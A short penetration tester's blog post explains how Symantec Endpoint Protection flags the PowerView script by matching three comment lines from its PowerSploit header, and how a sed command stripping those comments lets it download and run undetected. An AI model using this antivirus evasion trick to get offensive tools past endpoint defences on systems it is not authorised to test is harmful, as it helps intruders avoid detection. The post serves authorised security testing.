SEP immediately picked up on this and prevented the downloading of the script with an exception when calling “DownloadString”. Based on this it is safe to assume that it is getting caught when downloading the script, not while executing. I took a step further and assumed there was some basic text, most likely in comments, that was used to identify the Powerview script in the attack signature.

Workaround

I used the follow Sed command to pull out the comment and create a new comment-free Powerview.ps1 file:

sed '/<#/,/#>/d' powerview.ps1 > new_powerview.ps1

This will leave in single line comments, but it turns out that is not where the signature is located. After doing this, SEP was perfectly happy letting me download and execute Powerview cmdlets. Out of curiosity, I decided to drill down and identify the exact signature. Here it is:

PowerSploit Function: Set-MacAttribute
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause

Simply removing the above 3 lines will let you “bypass AV”.

new_powerview.ps1


This post has been cross-posted from the author’s blog:
https://pentestarmoury.wordpress.com/2016/01/30/powerview-caught-by-symantec-endpoint-protection/